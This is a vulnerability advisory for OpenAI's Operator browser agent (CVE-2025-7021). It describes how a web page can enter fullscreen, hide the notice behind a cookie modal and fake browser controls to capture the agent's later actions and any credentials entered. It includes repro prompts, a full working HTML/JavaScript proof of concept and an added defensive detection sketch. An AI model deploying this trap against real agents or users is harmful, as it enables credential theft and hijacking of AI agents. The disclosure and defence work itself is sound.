OpenAI Operator - Locking Operator on FullScreen

Moderate
rcorrea35 published GHSA-mmgx-755h-wr74 Jun 12, 2025

Package

No package listed

Affected versions

SaaS

Patched versions

None

Description

Summary

When Operator actuates on a page, the website can invoke the Fullscreen API. If the page grabs Operator's attention while the browser's fullscreen notice is on screen (e.g. by showing a cookie consent dialog), Operator does not notice that the page has entered fullscreen mode.
Therefore, any interaction with Operator after it visits the malicious page can be fully captured inside that site, either by drawing fake browser controls around an iframe or by rendering a remote browser in the DOM.

This means that any information entered thereafter (such as login credentials, email addresses, etc.) is fully compromised.
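As an added defender-side example (not part of the advisory or of OpenAI's code), the following sketches how an agent's browser harness could track fullscreen state itself instead of relying on the browser's transient notice, which the advisory shows can be masked by a modal. The functions `assessFullscreenRisk` and `watchFullscreen`, the event shape, the `onRisk` hook and the sample timeline are all assumptions constructed for this example.

```javascript
// Pure core: given a timeline of page events, decide whether the page entered
// fullscreen and, within `windowMs`, surfaced an attention-grabbing overlay
// (the pattern described in the advisory: fullscreen notice + cookie modal).
function assessFullscreenRisk(events, windowMs = 3000) {
  let enteredAt = null, overlayAt = null, stillFullscreen = false;
  for (const ev of events) {
    if (ev.type === "fullscreenchange") {
      stillFullscreen = ev.fullscreen;
      if (ev.fullscreen) enteredAt = ev.t;
    } else if (ev.type === "overlay-shown" && enteredAt !== null && overlayAt === null) {
      overlayAt = ev.t; // first overlay after fullscreen was entered
    }
  }
  const masked = enteredAt !== null && overlayAt !== null && overlayAt - enteredAt <= windowMs;
  return {
    fullscreen: stillFullscreen,
    // "high": a modal appeared while the browser's exit-fullscreen notice would
    // still have been visible, so any browser chrome (URL bar, tabs) seen in
    // the viewport must be treated as untrusted page content.
    risk: stillFullscreen ? (masked ? "high" : "medium") : "none",
    enteredAt,
    overlayAt,
  };
}

// Hypothetical harness hook. `doc` is the page document (or a test double);
// `onRisk` is where the harness would pin a persistent in-agent fullscreen
// indicator and require re-confirmation of the real URL before typing secrets.
function watchFullscreen(doc, onRisk, now = () => Date.now()) {
  const events = [];
  doc.addEventListener("fullscreenchange", () => {
    events.push({ type: "fullscreenchange", fullscreen: !!doc.fullscreenElement, t: now() });
    onRisk(assessFullscreenRisk(events));
  });
  // Overlay detection (e.g. a MutationObserver watching for new fixed,
  // viewport-covering elements) is out of scope here; the harness reports it.
  return {
    overlayShown() {
      events.push({ type: "overlay-shown", t: now() });
      onRisk(assessFullscreenRisk(events));
    },
    events,
  };
}

// Constructed timeline mirroring the advisory's PoC: fullscreen requested on
// click, cookie consent modal shown 40 ms later. Expected risk: "high".
const SAMPLE_POC_TIMELINE = [
  { type: "fullscreenchange", fullscreen: true, t: 1000 },
  { type: "overlay-shown", t: 1040 },
];
```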

Repro steps

  1. Ask Operator: "Summarize the following page: <URL of the PoC>".
  2. Observe that Operator summarizes the example.com content shown inside the iframe.
  3. Now ask: "Can you go to wikipedia.org and tell me when OpenAI was founded?".
  4. Observe that Operator actuates inside the fake browser controls.

Severity

Moderate - This vulnerability potentially allows an attacker to access information entered into Operator after Operator visits an attacker’s page.

Proof of Concept

<meta charset="utf-8">
<body>
<div>
    <span>
        <a href="#" onclick="fullscreen()">クリックして進む</a><br>
    </span>
    <style>
    .cookie-consent-overlay {
      position: fixed;
      top: 0;
      left: 0;
      right: 0;
      bottom: 0;
      background: rgba(0, 0, 0, 0.5);
      display: none;
      z-index: 9999;
    }
    /* Centered modal */
    .cookie-consent {
      position: fixed;
      top: 50%;
      left: 50%;
      transform: translate(-50%, -50%);
      background: #333;
      color: #fff;
      padding: 40px;
      text-align: center;
      font-size: 24px;
      z-index: 10000;
      border-radius: 8px;
      width: 80%;
      max-width: 600px;
      box-shadow: 0 0 20px rgba(0,0,0,0.5);
    }
    .cookie-consent button {
      background: #f1d600;
      border: none;
      color: #333;
      padding: 15px 30px;
      font-size: 24px;
      cursor: pointer;
      margin-top: 20px;
      border-radius: 4px;
    }
    </style>
</div>
    <style>
        body {
            overflow-y: hidden;
        }
    </style>
    <template>
        <img style="position:absolute;right:0px;top:0px;" height="8%" src="https://test.shhnjk.com/google.png" width="100%">
        <input type=text style="position:absolute;left:128px;top:45px;width:1100px;outline: none;" value="https://example.com">
        <iframe src="https://example.com" width="100%" height="92%" frameBorder="0" style="position:fixed;top:76px;right:0px"></iframe>
        <div class="cookie-consent-overlay" id="cookieConsentOverlay">
          <div class="cookie-consent" id="cookieConsent">
            <b id=notice>This website uses cookies to ensure you get the best experience.</b>
            <br>
            <button id=got>Got it!</button>
            <button id=close style="display:none;text-align: center;">Close</button>
          </div>
        </div>
        <script>
        let input = document.querySelector('input');
        let f = document.querySelector('iframe');
        input.addEventListener("keypress", event => {
          if (event.key === "Enter") {
            if (!input.value.includes(".")) {
                input.value = "https://www.bing.com/search?q=" + input.value;
            } else if (!input.value.startsWith("http")) {
              input.value = "https://" + input.value;
            }
            f.src = input.value;
          }
        });
        </script>
    </template>
    <script>
        function fullscreen() {
            document.documentElement.requestFullscreen();
            const template_content = document.querySelector('template').content;
            document.querySelector('div').appendChild(template_content);
            const overlay = document.getElementById("cookieConsentOverlay");
            overlay.style.display = "block";
            document.querySelector('#got').addEventListener('click',() => {
                document.querySelector('#got').style.display = "none";
                document.querySelector('#close').style.display = "block";
                document.querySelector('#notice').textContent = "Thank you for your understanding!";
            });
            document.querySelector('#close').addEventListener('click',() => {
                document.querySelector('#close').style.display = "none";
                overlay.style.display = "none";
            });
        }
    </script>
</body>

Timeline

Date reported: 03/07/2025
Date fixed: 05/14/2025
Date disclosed: 06/13/2025

Severity

Moderate

CVE ID

CVE-2025-7021

Weaknesses

No CWEs

Credits